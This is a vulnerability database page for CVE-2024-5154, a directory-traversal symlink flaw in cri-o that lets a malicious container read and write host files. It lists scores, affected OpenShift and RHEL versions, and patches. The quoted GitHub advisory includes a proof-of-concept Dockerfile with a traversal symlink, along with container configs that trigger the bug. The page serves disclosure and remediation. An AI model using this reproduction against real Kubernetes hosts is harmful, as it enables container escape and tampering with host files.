CVE-2024-5154

UNKNOWN

Published 2024-06-12T08:51:43.565Z

Actions:

Expert Analysis

Professional remediation guidance

Get tailored security recommendations from our analyst team for CVE-2024-5154. We'll provide specific mitigation strategies based on your environment and risk profile.

CVSS Score

V3.1

8.1

/10

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Base Score Metrics

Exploitability: N/A Impact: N/A

EPSS Score

v2023.03.01

0.000

probability

of exploitation in the wild

There is a 0.0% chance that this vulnerability will be exploited in the wild within the next 30 days.

Updated: 2025-01-25

Exploit Probability

Percentile: 0.187

Higher than 18.7% of all CVEs

Attack Vector Metrics

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Impact Metrics

Confidentiality

HIGH

Integrity

HIGH

Availability

NONE

Description

A flaw was found in cri-o. A malicious container can create a symbolic link to arbitrary files on the host via directory traversal (“../“). This flaw allows the container to read and write to arbitrary files on the host system.

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

Affected Products

Unknown Vendor

Unknown Product

Affected Versions:

1.30.0 1.29.4 1.28.6

Red Hat

Red Hat OpenShift Container Platform 4.12

Affected Versions:

0:1.25.5-21.2.rhaos4.12.gita3eb75f.el8

Red Hat

Red Hat OpenShift Container Platform 4.13

Affected Versions:

0:1.26.5-18.2.rhaos4.13.git2e90133.el9

Red Hat

Red Hat OpenShift Container Platform 4.14

Affected Versions:

0:1.27.7-3.rhaos4.14.git674563e.el9

Red Hat

Red Hat OpenShift Container Platform 4.15

Affected Versions:

0:1.28.7-2.rhaos4.15.git111aec5.el9

Red Hat

Red Hat OpenShift Container Platform 4.17

Affected Versions:

417.94.202412040832-0

Red Hat

Red Hat Enterprise Linux 8

Red Hat

Red Hat Enterprise Linux 9

Red Hat

Red Hat OpenShift Container Platform 3.11

Red Hat

Red Hat OpenShift Container Platform 4

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

✓ GitHub Reviewed HIGH

malicious container creates symlink "mtab" on the host External

GHSA-j9hf-98c3-wrm8

Advisory Details

### Impact A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host. A workload built from this Dockerfile: ``` FROM docker.io/library/busybox as source RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc FROM scratch COPY --from=source /bin /bin COPY --from=source /lib /lib COPY --from=source /extra . ``` and this container config: ``` { "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [ "/bin/true" ], "linux": { } } ``` and this sandbox config ``` { "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": { "security_context": { "namespace_options": { "network": 2 } } } } ``` will create a file on host `/host/mtab` ### Patches 1.30.1, 1.29.5, 1.28.7 ### Workarounds Unfortunately not ### References _Are there any links users can visit to find out more?_

Affected Packages

Go github.com/cri-o/cri-o

ECOSYSTEM: ≥1.28.6 <1.28.7

Go github.com/cri-o/cri-o

ECOSYSTEM: ≥1.29.4 <1.29.5

Go github.com/cri-o/cri-o

ECOSYSTEM: ≥1.30.0 <1.30.1

CVSS Scoring

CVSS Score

7.5

CVSS Vector


                                    CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

References

WEB https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8

ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-5154

WEB https://access.redhat.com/errata/RHSA-2024:10818

WEB https://access.redhat.com/errata/RHSA-2024:3676

WEB https://access.redhat.com/errata/RHSA-2024:3700

WEB https://access.redhat.com/errata/RHSA-2024:4008

WEB https://access.redhat.com/errata/RHSA-2024:4486

WEB https://access.redhat.com/security/cve/CVE-2024-5154

WEB https://bugzilla.redhat.com/show_bug.cgi?id=2280190

PACKAGE https://github.com/cri-o/cri-o

WEB https://pkg.go.dev/vuln/GO-2024-2919

Advisory provided by GitHub Security Advisory Database. Published: June 4, 2024, Modified: December 11, 2024

References

https://access.redhat.com/errata/RHSA-2024:10818

https://access.redhat.com/errata/RHSA-2024:3676

https://access.redhat.com/errata/RHSA-2024:3700

https://access.redhat.com/errata/RHSA-2024:4008

https://access.redhat.com/errata/RHSA-2024:4486

https://access.redhat.com/security/cve/CVE-2024-5154

https://bugzilla.redhat.com/show_bug.cgi?id=2280190

https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8

Published: 2024-06-12T08:51:43.565Z

Last Modified: 2025-06-17T03:40:37.009Z

Copied to clipboard!

CVE-2024-5154

Expert Analysis

CVSS Score

EPSS Score

Attack Vector Metrics

Impact Metrics

Description

Available Exploits

Related News

Affected Products

Unknown Product

Affected Versions:

Red Hat OpenShift Container Platform 4.12

Affected Versions:

Red Hat OpenShift Container Platform 4.13

Affected Versions:

Red Hat OpenShift Container Platform 4.14

Affected Versions:

Red Hat OpenShift Container Platform 4.15

Affected Versions:

Red Hat OpenShift Container Platform 4.17

Affected Versions:

Red Hat Enterprise Linux 8

Red Hat Enterprise Linux 9

Red Hat OpenShift Container Platform 3.11

Red Hat OpenShift Container Platform 4

GitHub Security Advisories

malicious container creates symlink "mtab" on the host External

Advisory Details

Affected Packages

CVSS Scoring

CVSS Score

CVSS Vector

References

References

Request Analysis

What to expect

Request Received!